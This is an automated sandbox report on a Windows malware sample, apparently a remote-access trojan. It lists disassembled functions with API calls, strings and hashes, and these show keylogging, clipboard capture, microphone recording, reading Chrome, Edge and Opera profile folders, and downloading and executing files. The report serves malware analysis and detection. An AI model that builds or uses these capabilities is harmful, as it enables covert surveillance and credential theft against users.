                                                                                                                                                • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                                                                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                                                                                Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                                                                                  • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1761009282-0
                                                                                                                                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                                                                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                                                                                Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorHandling__start
                                                                                                                                                • String ID: pow
                                                                                                                                                • API String ID: 3213639722-2276729525
                                                                                                                                                • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                                • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                                                                                • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                                • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                                                                                Function 00449EBC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F8F
                                                                                                                                                • GetLastError.KERNEL32 ref: 00449FAB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 203985260-263838557
                                                                                                                                                • Opcode ID: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                                                                                                                                • Instruction ID: e4919e29a80df6b7ced925805d10dfcffaa1b378e184719e11b938f1b8f94c7b
                                                                                                                                                • Opcode Fuzzy Hash: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                                                                                                                                • Instruction Fuzzy Hash: 2331E430200201ABFB21EF56C845BAB7768EF45721F15016BF815C7391DB38CD45E7A9
                                                                                                                                                Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Init_thread_footer__onexit
                                                                                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                                • API String ID: 1881088180-3686566968
                                                                                                                                                • Opcode ID: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                                                                                                                                • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                                                                                                • Opcode Fuzzy Hash: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                                                                                                                                • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                                                                                                Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002), ref: 00451C92
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                • API String ID: 0-711371036
                                                                                                                                                • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                                • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                                                                                • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                                • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                                                                                Function 0044B7B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BBEE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B85B
                                                                                                                                                • GetLastError.KERNEL32 ref: 0044B884
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 442123175-263838557
                                                                                                                                                • Opcode ID: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                                                                                                                                • Instruction ID: 9972a58bdd01e134d13becd973f3089a2f7b3635eb9ddb95e5d59f4384582b5e
                                                                                                                                                • Opcode Fuzzy Hash: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                                                                                                                                • Instruction Fuzzy Hash: B2316F31A00619DBCB24DF59DD8099AF3F9FF48301B1485AAE909D7261E734ED81CBA8
                                                                                                                                                Function 0044B6D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BC0E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B76D
                                                                                                                                                • GetLastError.KERNEL32 ref: 0044B796
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 442123175-263838557
                                                                                                                                                • Opcode ID: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                                                                                                                                • Instruction ID: c865f2f287ade0309940dd9d446f9ab1351fd896516eb6f8948e0fb5ca6ebdce
                                                                                                                                                • Opcode Fuzzy Hash: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                                                                                                                                • Instruction Fuzzy Hash: 69219435600219DFDB14CF69D980BEAB3F9EB48312F1048AAE94AD7251D734ED85CB64
                                                                                                                                                Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                                                                                Strings
                                                                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LocalTime
                                                                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                • API String ID: 481472006-1507639952
                                                                                                                                                • Opcode ID: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                                                                                                                                • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                                                                                                • Opcode Fuzzy Hash: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                                                                                                                                • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                                                                                                Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • Sleep.KERNEL32 ref: 0041667B
                                                                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DownloadFileSleep
                                                                                                                                                • String ID: !D@
                                                                                                                                                • API String ID: 1931167962-604454484
                                                                                                                                                • Opcode ID: 55e5d64e7b98f77c9516b1aa3147275b9d54505b18039c208d99df416d007d74
                                                                                                                                                • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                                                                                                • Opcode Fuzzy Hash: 55e5d64e7b98f77c9516b1aa3147275b9d54505b18039c208d99df416d007d74
                                                                                                                                                • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                                                                                Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                • String ID: alarm.wav$hYG
                                                                                                                                                • API String ID: 1174141254-2782910960
                                                                                                                                                • Opcode ID: b1264f66081e357ea998da1c4a3710e4054d322a9d90202bb867bf05cfcdbcb2
                                                                                                                                                • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                                                                                                • Opcode Fuzzy Hash: b1264f66081e357ea998da1c4a3710e4054d322a9d90202bb867bf05cfcdbcb2
                                                                                                                                                • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                                                                                                Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                                                                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                                                                                • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                • String ID: Online Keylogger Stopped
                                                                                                                                                • API String ID: 1623830855-1496645233
                                                                                                                                                • Opcode ID: d2011962e6819f9b37a51f0e1cf8c7d5879c21619fea64d9aec53d325501bd1f
                                                                                                                                                • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                                                                                • Opcode Fuzzy Hash: d2011962e6819f9b37a51f0e1cf8c7d5879c21619fea64d9aec53d325501bd1f
                                                                                                                                                • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                                                                                Function 00448C33 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,A4E85006,00000001,?,0043CEA5), ref: 00448CA4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String
                                                                                                                                                • String ID: LCMapStringEx$PkGNG
                                                                                                                                                • API String ID: 2568140703-1065776982
                                                                                                                                                • Opcode ID: 1885f0d73e679dc43364bca4b79527da2e22ca333ca41b5935a1c787a3402146
                                                                                                                                                • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                                                                                                                • Opcode Fuzzy Hash: 1885f0d73e679dc43364bca4b79527da2e22ca333ca41b5935a1c787a3402146
                                                                                                                                                • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                                                                                                                Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                                                                                                                • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wave$BufferHeaderPrepare
                                                                                                                                                • String ID: XMG
                                                                                                                                                • API String ID: 2315374483-813777761
                                                                                                                                                • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                                                                                                                • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                                                                                • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                                                                                                                • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                                                                                Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LocaleValid
                                                                                                                                                • String ID: IsValidLocaleName$kKD
                                                                                                                                                • API String ID: 1901932003-3269126172
                                                                                                                                                • Opcode ID: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
                                                                                                                                                • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                                                                                • Opcode Fuzzy Hash: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
                                                                                                                                                • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                                                                                Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                • API String ID: 1174141254-4188645398
                                                                                                                                                • Opcode ID: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                                                                                                                                • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                                                                                • Opcode Fuzzy Hash: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                                                                                                                                • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                                                                                Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                • API String ID: 1174141254-2800177040
                                                                                                                                                • Opcode ID: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                                                                                                                                • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                                                                                • Opcode Fuzzy Hash: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                                                                                                                                • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                                                                                Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                                                • API String ID: 1174141254-1629609700
                                                                                                                                                • Opcode ID: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                                                                                                                                • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                                                                                • Opcode Fuzzy Hash: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                                                                                                                                • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                                                                                Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                                                                                  • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                                                                                                  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                                                                  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                                                                                                  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                                                                  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                                                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                                                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                                                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                • String ID: [AltL]$[AltR]
                                                                                                                                                • API String ID: 2738857842-2658077756
                                                                                                                                                • Opcode ID: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                                                                                                                                • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                                                                                • Opcode Fuzzy Hash: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                                                                                                                                • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                                                                                Function 004489D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$FileSystem
                                                                                                                                                • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                                                                                                                                • API String ID: 2086374402-949981407
                                                                                                                                                • Opcode ID: b67c042d7bc2b84d65cb935a06f544084891d6a740928cef279651ffc9d800ce
                                                                                                                                                • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                                                                                                                • Opcode Fuzzy Hash: b67c042d7bc2b84d65cb935a06f544084891d6a740928cef279651ffc9d800ce
                                                                                                                                                • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                                                                                                                Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExecuteShell
                                                                                                                                                • String ID: !D@$open
                                                                                                                                                • API String ID: 587946157-1586967515
                                                                                                                                                • Opcode ID: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
